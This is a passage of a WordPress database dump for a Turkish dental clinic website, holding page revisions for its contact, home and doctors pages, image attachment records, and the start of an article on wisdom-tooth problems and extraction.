items=\"%5B%7B%22type%22%3A%22facebook%22%2C%22url%22%3A%22https%3A%2F%2Fwww.facebook.com%2FZe-Dent-A%25C4%259F%25C4%25B1z-Ve-Di%25C5%259F-Sa%25C4%259Fl%25C4%25B1%25C4%259F%25C4%25B1-Poliklini%25C4%259Fi-1050669254966662%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%2C%7B%22type%22%3A%22twitter%22%2C%22url%22%3A%22%23%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%2C%7B%22type%22%3A%22instagram%22%2C%22url%22%3A%22https%3A%2F%2Fwww.instagram.com%2Fze_dent%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%5D\"][us_separator][vc_column_text]\r\n<h3>İletişim Bilgileri</h3>\r\n[/vc_column_text][us_iconbox icon=\"fas|map-marker-alt\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"İzmir 1 Caddesi Aydın Apartmanı No: 33/22 Kızılay / ANKARA\" title_tag=\"div\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|phone\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"0.312 425 16 56\" title_tag=\"div\" link=\"url:tel%3A%2B903124251656|||\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|phone\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"0.312 232 16 56\" title_tag=\"div\" link=\"url:tel%3A%2B903122321656|||\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|envelope\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"info@ze-dent.com\" title_tag=\"div\" link=\"url:mailto%3Ainfo%40ze-dent.com|||\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|envelope\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"ze-dent@hotmail.com\" title_tag=\"div\" link=\"url:mailto%3Aze-dent%40hotmail.com|||\"][/us_iconbox][/vc_column][vc_column width=\"2/3\"][vc_column_text]\r\n<h3>İletişim Formm</h3>\r\nSoru ve önerilerini aşağıdaki formu doldurarak bize iletebilirsiniz.[/vc_column_text][us_cform receiver_email=\"ze-dent@hotmail.com\" name_field=\"shown\" captcha_field=\"required\" button_style=\"outlined\"]I consent to the processing and storage of my personal data[/us_cform][/vc_column][/vc_row]', 'İletişim', '', 'inherit', 'closed', 'closed', '', '9-revision-v1', '', '', '2018-07-17 13:51:09', '2018-07-17 10:51:09', '', 9, 'http://www.ze-dent.com/9-revision-v1/', 0, 'revision', '', 0),
(6497, 1, '2018-07-17 13:52:30', '2018-07-17 10:52:30', '[vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\"][vc_column][rev_slider_vc alias=\"home\"][/vc_column][/vc_row][vc_row color_scheme=\"alternate\"][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|clock\" size=\"50px\" title=\"Çalışma Saatleri\" type=\"icon_left\" link_text=\"Learn More\"]Pazartesi - Cumartesi 10:00 - 19:00[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|certificate\" size=\"50px\" title=\"Uzman Hekimler\" type=\"icon_left\" link_text=\"Learn More\"]Alanlarında uzman doktorlarımız, sağlığınız için, size daha iyi hizmet edebilmek için buradalar…[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|graduation-cap\" size=\"50px\" title=\"Tecrübe\" type=\"icon_left\" link_text=\"Learn More\"]20 yılı aşkın tecrübemizle sizlere hizmet veriyoruz.[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|smile\" size=\"50px\" title=\"Memnuniyet\" type=\"icon_left\" link_text=\"Learn More\"]Önceliğimiz tartışmasız hasta sağlığı ve memnuniyetidir.[/us_iconbox][/vc_column][/vc_row][vc_row content_placement=\"middle\" gap=\"20\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(30,30,30,0.75)\"][vc_column animate=\"afb\" width=\"1/2\"][vc_column_text]\r\n<h2>Dr. Zeki ERDOĞAN</h2>\r\nDişlerinizin genel durumunun iyileştirilmesi, hem sağlığınız hem de estetik kaygıların önüne geçmeniz açısından çok önemlidir.\r\nDişlerinizde etkili çözümler ve tam kapsamlı bir tedavi için ağız yapısı doğru incelenmeli, gerçekleştirilmesi gereken tedavi yöntemleri belirlenmeli ve etkili bir yol haritası izlenmelidir. Ağız sağlığınıza çok yönlü fayda sunan tedavi yöntemleri ile her açıdan güvenli çözümler elde edin.[/vc_column_text][/vc_column][vc_column animate=\"afb\" animate_delay=\"0.2\" width=\"1/2\"][us_single_image image=\"6419\" size=\"full\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\" overlay=\"black_30\" el_id=\"portfolio\"][vc_column][us_grid post_type=\"us_portfolio\" type=\"carousel\" columns=\"6\" items_gap=\"\" items_quantity=\"\" items_layout=\"6416\" carousel_arrows=\"1\" carousel_autoplay=\"1\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column animate=\"afb\"][vc_column_text]\r\n<h2 style=\"text-align: center;\">diş bakımı ihmale gelmez,\r\ndüzenli olarak muayene olmayı ihmal etmeyin.</h2>\r\n[/vc_column_text][us_btn text=\"İletişim Bilgileri\" link=\"url:%2Filetisim%2F|||\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"huge\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(25,25,25,0.62)\" el_id=\"second\"][vc_column][vc_column_text]\r\n<h2 style=\"text-align: center;\">Neden<strong> ZEDENT </strong>?</h2>\r\n[/vc_column_text][us_separator size=\"large\"][vc_row_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"20\" title=\"Yıllık Tecrübe\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"79\" color=\"primary\" title=\"Farklı Seminer\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"452\" suffix=\"+\" title=\"Gülen Misafirimiz\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"14\" color=\"primary\" title=\"Alan Sertifikası\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]', 'Anasayfa', '', 'inherit', 'closed', 'closed', '', '8-revision-v1', '', '', '2018-07-17 13:52:30', '2018-07-17 10:52:30', '', 8, 'http://www.ze-dent.com/8-revision-v1/', 0, 'revision', '', 0),
(6498, 1, '2018-07-18 13:10:04', '2018-07-18 10:10:04', '[vc_row height=\"auto\" width=\"full\"][vc_column][us_gmaps marker_address=\"\" marker_text=\"JTNDY2VudGVyJTNFWkVERU5UJTIwJTNDYnIlM0VBJUM0JTlGJUM0JUIxeiUyMHZlJTIwRGklQzUlOUYlMjBTYSVDNCU5RmwlQzQlQjElQzQlOUYlQzQlQjElMjBQb2xpa2xpbmklQzQlOUZpJTNDJTJGY2VudGVyJTNF\" zoom=\"17\" latitude=\"39.922046\" longitude=\"32.853018\" add_markers=\"1\" markers=\"%5B%5D\"][/vc_column][/vc_row][vc_row gap=\"20\"][vc_column width=\"1/3\"][vc_column_text]\r\n<h3>Sosyal Medya</h3>\r\n[/vc_column_text][us_social_links size=\"22px\" items=\"%5B%7B%22type%22%3A%22facebook%22%2C%22url%22%3A%22https%3A%2F%2Fwww.facebook.com%2FZe-Dent-A%25C4%259F%25C4%25B1z-Ve-Di%25C5%259F-Sa%25C4%259Fl%25C4%25B1%25C4%259F%25C4%25B1-Poliklini%25C4%259Fi-1050669254966662%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%2C%7B%22type%22%3A%22instagram%22%2C%22url%22%3A%22https%3A%2F%2Fwww.instagram.com%2Fze_dent%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%5D\"][us_separator][vc_column_text]\r\n<h3>İletişim Bilgileri</h3>\r\n[/vc_column_text][us_iconbox icon=\"fas|map-marker-alt\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"İzmir 1 Caddesi Aydın Apartmanı No: 33/22 Kızılay / ANKARA\" title_tag=\"div\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|phone\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"0.312 425 16 56\" title_tag=\"div\" link=\"url:tel%3A%2B903124251656|||\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|phone\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"0.312 232 16 56\" title_tag=\"div\" link=\"url:tel%3A%2B903122321656|||\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|envelope\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"ze-dent@hotmail.com\" title_tag=\"div\" link=\"url:mailto%3Aze-dent%40hotmail.com|||\"][/us_iconbox][/vc_column][vc_column width=\"2/3\"][vc_column_text]\r\n<h3>İletişim Formu</h3>\r\nSoru ve önerilerini aşağıdaki formu doldurarak bize iletebilirsiniz.[/vc_column_text][us_cform receiver_email=\"ze-dent@hotmail.com\" name_field=\"shown\" captcha_field=\"required\" button_style=\"outlined\"]I consent to the processing and storage of my personal data[/us_cform][/vc_column][/vc_row]', 'İletişim', '', 'inherit', 'closed', 'closed', '', '9-revision-v1', '', '', '2018-07-18 13:10:04', '2018-07-18 10:10:04', '', 9, 'http://www.ze-dent.com/9-revision-v1/', 0, 'revision', '', 0),
(6499, 1, '2018-07-18 13:15:37', '2018-07-18 10:15:37', '', 'logo6', '', 'inherit', 'closed', 'closed', '', 'logo6', '', '', '2018-07-18 13:15:37', '2018-07-18 10:15:37', '', 6290, 'http://www.ze-dent.com/wp-content/uploads/2018/07/logo6.jpg', 0, 'attachment', 'image/jpeg', 0),
(6500, 1, '2018-07-18 13:15:47', '2018-07-18 10:15:47', '[vc_row][vc_column][us_logos with_indents=\"1\" img_size=\"full\" carousel_dots=\"1\" carousel_center=\"1\" carousel_autoplay=\"1\" carousel_interval=\"2\" breakpoint_1_autoplay=\"1\" breakpoint_2_autoplay=\"1\" breakpoint_3_autoplay=\"1\" items=\"%5B%7B%22image%22%3A%226292%22%7D%2C%7B%22image%22%3A%226294%22%7D%2C%7B%22image%22%3A%226291%22%7D%2C%7B%22image%22%3A%226295%22%7D%2C%7B%22image%22%3A%226293%22%2C%22link%22%3A%22%7C%7C%7C%22%7D%2C%7B%22image%22%3A%226499%22%7D%5D\"][/vc_column][/vc_row]', 'Anlaşmalı Kurumlar', '', 'inherit', 'closed', 'closed', '', '6290-revision-v1', '', '', '2018-07-18 13:15:47', '2018-07-18 10:15:47', '', 6290, 'http://www.ze-dent.com/6290-revision-v1/', 0, 'revision', '', 0),
(6502, 1, '2018-07-18 13:19:01', '2018-07-18 10:19:01', '[vc_row height=\"large\"][vc_column width=\"1/3\"][us_person image=\"6501\" name=\"ZEKİ ERDOĞAN\" role=\"Diş Hekimi\" link=\"|||\" email=\"info@ze-dent.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6220\" name=\"Uzm. Dr. Dt. AYŞEGÜL DALKIRAN ARSLAN\" role=\"Ortodontist\" link=\"|||\" email=\"info@ze-dent.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6421\" name=\"DUYGU DEMİR\" role=\"Diş Hekimi\" link=\"|||\" email=\"info@ze-dent.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][/vc_row]', 'Hekimlerimiz', '', 'inherit', 'closed', 'closed', '', '1194-revision-v1', '', '', '2018-07-18 13:19:01', '2018-07-18 10:19:01', '', 1194, 'http://www.ze-dent.com/1194-revision-v1/', 0, 'revision', '', 0),
(6503, 1, '2018-07-18 13:19:54', '2018-07-18 10:19:54', '[vc_row height=\"large\"][vc_column width=\"1/3\"][us_person image=\"6501\" name=\"ZEKİ ERDOĞAN\" role=\"Diş Hekimi\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6220\" name=\"Uzm. Dr. Dt. AYŞEGÜL DALKIRAN ARSLAN\" role=\"Ortodontist\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6421\" name=\"DUYGU DEMİR\" role=\"Diş Hekimi\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][/vc_row]', 'Hekimlerimiz', '', 'inherit', 'closed', 'closed', '', '1194-revision-v1', '', '', '2018-07-18 13:19:54', '2018-07-18 10:19:54', '', 1194, 'http://www.ze-dent.com/1194-revision-v1/', 0, 'revision', '', 0),
(6504, 1, '2018-07-18 13:20:10', '2018-07-18 10:20:10', '[vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\"][vc_column][rev_slider_vc alias=\"home\"][/vc_column][/vc_row][vc_row color_scheme=\"alternate\"][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|clock\" size=\"50px\" title=\"Çalışma Saatleri\" type=\"icon_left\" link_text=\"Learn More\"]Pazartesi - Cumartesi 09:00 - 19:00[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|certificate\" size=\"50px\" title=\"Uzman Hekimler\" type=\"icon_left\" link_text=\"Learn More\"]Alanlarında uzman doktorlarımız, sağlığınız için, size daha iyi hizmet edebilmek için buradalar…[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|graduation-cap\" size=\"50px\" title=\"Tecrübe\" type=\"icon_left\" link_text=\"Learn More\"]20 yılı aşkın tecrübemizle sizlere hizmet veriyoruz.[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|smile\" size=\"50px\" title=\"Memnuniyet\" type=\"icon_left\" link_text=\"Learn More\"]Önceliğimiz tartışmasız hasta sağlığı ve memnuniyetidir.[/us_iconbox][/vc_column][/vc_row][vc_row content_placement=\"middle\" gap=\"20\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(30,30,30,0.75)\"][vc_column animate=\"afb\" width=\"1/2\"][vc_column_text]\r\n<h2>Dr. Zeki ERDOĞAN</h2>\r\nDişlerinizin genel durumunun iyileştirilmesi, hem sağlığınız hem de estetik kaygıların önüne geçmeniz açısından çok önemlidir.\r\nDişlerinizde etkili çözümler ve tam kapsamlı bir tedavi için ağız yapısı doğru incelenmeli, gerçekleştirilmesi gereken tedavi yöntemleri belirlenmeli ve etkili bir yol haritası izlenmelidir. Ağız sağlığınıza çok yönlü fayda sunan tedavi yöntemleri ile her açıdan güvenli çözümler elde edin.[/vc_column_text][/vc_column][vc_column animate=\"afb\" animate_delay=\"0.2\" width=\"1/2\"][us_single_image image=\"6419\" size=\"full\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\" overlay=\"black_30\" el_id=\"portfolio\"][vc_column][us_grid post_type=\"us_portfolio\" type=\"carousel\" columns=\"6\" items_gap=\"\" items_quantity=\"\" items_layout=\"6416\" carousel_arrows=\"1\" carousel_autoplay=\"1\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column animate=\"afb\"][vc_column_text]\r\n<h2 style=\"text-align: center;\">diş bakımı ihmale gelmez,\r\ndüzenli olarak muayene olmayı ihmal etmeyin.</h2>\r\n[/vc_column_text][us_btn text=\"İletişim Bilgileri\" link=\"url:%2Filetisim%2F|||\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"huge\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(25,25,25,0.62)\" el_id=\"second\"][vc_column][vc_column_text]\r\n<h2 style=\"text-align: center;\">Neden<strong> ZEDENT </strong>?</h2>\r\n[/vc_column_text][us_separator size=\"large\"][vc_row_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"20\" title=\"Yıllık Tecrübe\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"79\" color=\"primary\" title=\"Farklı Seminer\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"452\" suffix=\"+\" title=\"Gülen Misafirimiz\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"14\" color=\"primary\" title=\"Alan Sertifikası\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]', 'Anasayfa', '', 'inherit', 'closed', 'closed', '', '8-revision-v1', '', '', '2018-07-18 13:20:10', '2018-07-18 10:20:10', '', 8, 'http://www.ze-dent.com/8-revision-v1/', 0, 'revision', '', 0),
(6506, 1, '2018-07-18 13:35:02', '2018-07-18 10:35:02', '[vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\"][vc_column][rev_slider_vc alias=\"home\"][/vc_column][/vc_row][vc_row color_scheme=\"alternate\"][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|clock\" size=\"50px\" title=\"Çalışma Saatleri\" type=\"icon_left\" link_text=\"Learn More\"]Pazartesi - Cumartesi 09:00 - 19:00[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|certificate\" size=\"50px\" title=\"Uzman Hekimler\" type=\"icon_left\" link_text=\"Learn More\"]Alanlarında uzman doktorlarımız, sağlığınız için, size daha iyi hizmet edebilmek için buradalar…[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|graduation-cap\" size=\"50px\" title=\"Tecrübe\" type=\"icon_left\" link_text=\"Learn More\"]20 yılı aşkın tecrübemizle sizlere hizmet veriyoruz.[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|smile\" size=\"50px\" title=\"Memnuniyet\" type=\"icon_left\" link_text=\"Learn More\"]Önceliğimiz tartışmasız hasta sağlığı ve memnuniyetidir.[/us_iconbox][/vc_column][/vc_row][vc_row content_placement=\"middle\" gap=\"20\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(30,30,30,0.75)\"][vc_column animate=\"afb\" width=\"1/2\"][vc_column_text]\r\n<h2>Dr. Zeki ERDOĞAN</h2>\r\nDişlerinizin genel durumunun iyileştirilmesi, hem sağlığınız hem de estetik kaygıların önüne geçmeniz açısından çok önemlidir.\r\nDişlerinizde etkili çözümler ve tam kapsamlı bir tedavi için ağız yapısı doğru incelenmeli, gerçekleştirilmesi gereken tedavi yöntemleri belirlenmeli ve etkili bir yol haritası izlenmelidir. Ağız sağlığınıza çok yönlü fayda sunan tedavi yöntemleri ile her açıdan güvenli çözümler elde edin.[/vc_column_text][/vc_column][vc_column animate=\"afb\" animate_delay=\"0.2\" width=\"1/2\"][us_single_image image=\"6505\" size=\"full\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\" overlay=\"black_30\" el_id=\"portfolio\"][vc_column][us_grid post_type=\"us_portfolio\" type=\"carousel\" columns=\"6\" items_gap=\"\" items_quantity=\"\" items_layout=\"6416\" carousel_arrows=\"1\" carousel_autoplay=\"1\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column animate=\"afb\"][vc_column_text]\r\n<h2 style=\"text-align: center;\">diş bakımı ihmale gelmez,\r\ndüzenli olarak muayene olmayı ihmal etmeyin.</h2>\r\n[/vc_column_text][us_btn text=\"İletişim Bilgileri\" link=\"url:%2Filetisim%2F|||\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"huge\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(25,25,25,0.62)\" el_id=\"second\"][vc_column][vc_column_text]\r\n<h2 style=\"text-align: center;\">Neden<strong> ZEDENT </strong>?</h2>\r\n[/vc_column_text][us_separator size=\"large\"][vc_row_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"20\" title=\"Yıllık Tecrübe\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"79\" color=\"primary\" title=\"Farklı Seminer\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"452\" suffix=\"+\" title=\"Gülen Misafirimiz\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"14\" color=\"primary\" title=\"Alan Sertifikası\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]', 'Anasayfa', '', 'inherit', 'closed', 'closed', '', '8-revision-v1', '', '', '2018-07-18 13:35:02', '2018-07-18 10:35:02', '', 8, 'http://www.ze-dent.com/8-revision-v1/', 0, 'revision', '', 0),
(6507, 1, '2018-07-18 13:38:00', '2018-07-18 10:38:00', '', 'fav', '', 'inherit', 'closed', 'closed', '', 'fav', '', '', '2018-07-18 13:38:00', '2018-07-18 10:38:00', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/fav.png', 0, 'attachment', 'image/png', 0),
(6508, 1, '2018-07-18 13:38:01', '2018-07-18 10:38:01', '', 'logo-y', '', 'inherit', 'closed', 'closed', '', 'logo-y', '', '', '2018-07-18 13:38:01', '2018-07-18 10:38:01', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/logo-y.png', 0, 'attachment', 'image/png', 0),
(6509, 1, '2018-07-18 13:46:05', '2018-07-18 10:46:05', '', 'd-y', '', 'inherit', 'closed', 'closed', '', 'd-y', '', '', '2018-07-18 13:46:05', '2018-07-18 10:46:05', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/d-y.png', 0, 'attachment', 'image/png', 0),
(6510, 1, '2018-07-18 13:46:06', '2018-07-18 10:46:06', '', 'e-m-y', '', 'inherit', 'closed', 'closed', '', 'e-m-y', '', '', '2018-07-18 13:46:06', '2018-07-18 10:46:06', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/e-m-y.png', 0, 'attachment', 'image/png', 0),
(6512, 1, '2018-07-18 13:46:09', '2018-07-18 10:46:09', '', 'logo-slider-y', '', 'inherit', 'closed', 'closed', '', 'logo-slider-y', '', '', '2018-07-18 13:46:09', '2018-07-18 10:46:09', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/logo-slider-y.png', 0, 'attachment', 'image/png', 0),
(6513, 1, '2018-07-18 13:46:10', '2018-07-18 10:46:10', '', 'n-y', '', 'inherit', 'closed', 'closed', '', 'n-y', '', '', '2018-07-18 13:46:10', '2018-07-18 10:46:10', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/n-y.png', 0, 'attachment', 'image/png', 0),
(6514, 1, '2018-07-18 13:46:11', '2018-07-18 10:46:11', '', 't-y', '', 'inherit', 'closed', 'closed', '', 't-y', '', '', '2018-07-18 13:46:11', '2018-07-18 10:46:11', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/t-y.png', 0, 'attachment', 'image/png', 0),
(6515, 1, '2018-07-18 13:46:12', '2018-07-18 10:46:12', '', 'z-y', '', 'inherit', 'closed', 'closed', '', 'z-y', '', '', '2018-07-18 13:46:12', '2018-07-18 10:46:12', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/z-y.png', 0, 'attachment', 'image/png', 0),
(6516, 1, '2018-07-18 13:47:55', '2018-07-18 10:47:55', '', 'e-y-y', '', 'inherit', 'closed', 'closed', '', 'e-y-y', '', '', '2018-07-18 13:47:55', '2018-07-18 10:47:55', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/e-y-y.png', 0, 'attachment', 'image/png', 0),
(6517, 1, '2018-07-18 20:36:26', '2018-07-18 17:36:26', '<p>[vc_row][vc_column][vc_column_text]<strong>20’lik dişler (20 yaş dişleri)</strong></p>\n<p>20’lik dişler ağızda en son süren ve ağız sağlığı açısından en az öneme sahip dişlerdir. Bu dişler 3. büyük azılardır. ‘20 yaş dişi’ olarak adlandırılmalarının nedeni 17-23 yaş arasında sürmeleridir.<br />\nYaş ilerledikçe beslenme alışkanlıklarının değişmesiyle çene yapısı küçülür. Bu sebeple dişler, çenede rahat bir şekilde sürecek yer bulamazlar. Bu yer darlığı ve dişlerin çıkmaya eğilimi, 20 yaş dişleri problemlerini oluşturur.<br />\nÇoğu insanda ağzın dört köşesinde birer adet olmak üzere toplam dört tane 20’lik diş bulunur. Genellikle diş etine veya kemik içerisine gömülü bulunurlar ya da yer darlığı yüzünden farklı yönlerde sürerler. Bunlar bir dizi probleme yol açtığından daha fazla sıkıntıya neden olmadan hekim kararıyla çekilmeleri gerekir.</p>\n<p>20’lik dişlerin çıkarılması için en uygun zaman 17 yaş civarıdır. Çünkü bu yaşlarda diş yeni oluşmaya başlamıştır ve kemik yetişkinlerdeki gibi sert olmadığı için ameliyatı kolaydır. Dişlerin kökleri tam olarak oluşmadığı için de iyileşme daha hızlı olacaktır.<br />\n20’lik dişin yol açtığı sıkıntılar çeşitli faktörlere göre değişir. Çene boyutu ve dişin süreceği yön, problemin büyüklüğünde belirleyicidir. Belki hiçbir ağrı ve şikayet olmayabilir ama diğer dişler büyük risk altındadır.</p>\n<p><strong>20’lik dişlerin yol açtığı problemler</strong><br />\nDişlerin değişik sürme şekillerini ve yol açtıkları problemleri öğrenirseniz ; neden çekilmeleri gerektiğini daha iyi anlayacaksınız.</p>\n<p><strong>ÇÜRÜK:</strong> Tükürük, bakteri ve yiyecek parçacıkları yeni çıkmakta olan dişin açtığı yuvada birikerek hem yirmilik dişi hem de yanındaki azı dişini tehdit eder. Bu tip çürükleri fark etmek ve tedavi etmek oldukça zordur. Ağrı ve enfeksiyona yol açan ve apseyle sonuçlanan ağır tablolar meydana gelebiliyor.</p>\n<p><strong>DİŞETİ HASTALIĞI (perikoronit):</strong> Kısmen çıkmış bir yirmilik dişin dişetinde bakteri ve yiyecek artıklarının depolandığı bir enfeksiyon odağı oluşur. Bu durum ağız kokusu, ağrı, ödem ve trismusa (ağzın tam açılamaması hali) sebep olur. Enfeksiyon lenfler aracılığı ile yanak ve boyuna yayılabilir. Yirmilik dişin etrafındaki bu enfeksiyona yatkın zemin her seferinde kolayca enfekte olmaya adaydır. (Bakınız, Dişeti hastalıkları)</p>\n<p><strong>BASINÇ AĞRISI:</strong> Sürme sırasında komşu dişlere de basınç uygulanıyorsa sıkışmadan dolayı da bir ağrı hissedilebilir. Bazı durumlarda bu basınç aşınmaya yol açar.</p>\n<p><strong>ORTODONTİK SEBEPLER:</strong> Pek çok genç birey dişlerindeki çapraşıklıkları düzeltmek için ortodontik tedavi görmektedir. Yirmi yaş dişlerinin sürme basınçları diğer dişlere de yansıyacağından diğer dişlerde de bir hareketlilik olur, çapraşıklıklar artabilir.</p>\n<p><strong>PROTEZLE İLGİLİ SEBEPLER:</strong> Protez planlaması yapılan bir ağızda yirmilik dişleri hesaba katmak gerekir. Çünkü, yirmilik diş çekildikten sonra değişen ağız yapısına göre yeni bir protez yapmak gerekecektir.</p>\n<p><strong>KİST OLUŞUMU:</strong> Gömülü bir dişin sebep olduğu kistik vakalar gözlenmiştir. Kist kemik yıkımına, çene genişlemesine ve çevredeki dişlerin yer değiştirmesine ya da zarar görmesine sebep olur. Kemik yıkımını önlemek için diş çekilmeli ve kist temizlenmelidir. Nadiren bu kist çok geniş alanlara yayılırsa tümörlere dönüşebilir veya çene kemiğinde kendiliğinden kırılmalara yol açabilir.</p>\n<p>20 lik dişlerin çıkarılması için en uygun zaman 17 yaş civarıdır. Çünkü bu senelerde bu diş yeni oluşmaya başlamış, kemik yetişkinlerdeki gibi sert olmadığı için ameliyatı kolaydır. Dişlerin kökleri tam olarak oluşmadığı için de iyileşme daha hızlı olacaktır.</p>\n<p><strong>20’lik dişin çekim aşamaları</strong><br />\n20 lik diş ameliyatı dişsel ve genel sağlık durumunuzun değerlendirilmesiyle başlar. 